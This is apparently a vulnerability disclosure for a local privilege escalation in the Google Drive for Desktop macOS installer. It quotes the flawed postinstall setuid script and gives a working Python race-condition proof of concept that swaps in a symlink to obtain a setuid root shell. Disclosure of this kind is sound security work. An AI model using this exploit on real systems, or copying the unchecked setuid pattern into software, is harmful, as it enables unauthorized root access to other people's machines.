Summary:
Google Drive for Desktop macOS installer contains a local privilege escalation vulnerability.
Product:
Google Drive
Vulnerability type:
Privilege Escalation
Details
Google Drive for Desktop (version 62.0.1.0) macOS installer contains a local privilege escalation vulnerability.
In the postinstall script of GoogleDrive.pkg, the following "setuid" function called for adding setuid permission to executables (load_dfsfuse, mount_dfsfuse, and mount_helper).
#!/usr/bin/env sh
set -x
CONTENTS_ROOT="/Applications/Google Drive.app/Contents"
RESOURCES_ROOT="$CONTENTS_ROOT/Resources"
BINARIES_ROOT="$CONTENTS_ROOT/MacOS"
LOAD_DFSFUSE="$BINARIES_ROOT/load_dfsfuse"
MOUNT_DFSFUSE="$BINARIES_ROOT/mount_dfsfuse"
MOUNT_HELPER="$BINARIES_ROOT/mount_helper"
# Must be called after cleanup and before starting the new application.
setuid() {
# setuid the load_dfsfuse and mount_dfsfuse binaries.
chmod u+s "$LOAD_DFSFUSE"
chmod u+s "$MOUNT_DFSFUSE"
chmod u+s "$MOUNT_HELPER"
}
Unfortunately, during the installation, it does not check whether these three files are a symbolic link before adding setuid. So, if an attacker can place symbolic link to the executable owned by root (e.g., executables under /usr/local/bin/ ), setuid attribute is set to its executable. Then,  he can run the executable with root permission.
Creating a symbolic link is usually prohibited because files under "/Application/Google Drive.app/Contents/MacOS" is owned by root. However, an attacker can create "/Application/Google Drive.app/Contents/MacOS" directory owned by a non-root user before the package installation. The installer does not delete this existing directory, and load_dfsfuse, mount_dfsfuse, and mount_helper are copied to the directory owned by the non-root user. So, an attacker can delete load_dfsfuse (, mount_dfsfuse, or mount_helper) and create a symbolic link.
I have created PoC. The steps to reproduce are as follows.
The following python script is saved as win_race.py. and run this script. In this PoC,  setuid attribute is set to /opt/local/bin/fish executable. This executable is installed via Mac Ports (
https://www.macports.org
) package manager.
import os
while True:
try:
os.system("mkdir -p '/Applications/Google Drive.app/Contents/MacOS'")
if os.stat("/Applications/Google Drive.app/Contents/MacOS/load_dfsfuse").st_uid == 0:
os.system("rm -f '/Applications/Google Drive.app/Contents/MacOS/load_dfsfuse'")
os.system("ln -s /opt/local/bin/fish '/Applications/Google Drive.app/Contents/MacOS/load_dfsfuse'")
except:
pass
Run the installer.
Setuid is set to /opt/local/bin/fish.
Run /opt/local/bin/fish and gain a root shell
Attack scenario
A local attacker can exploit this vulnerability and escalate its privilege.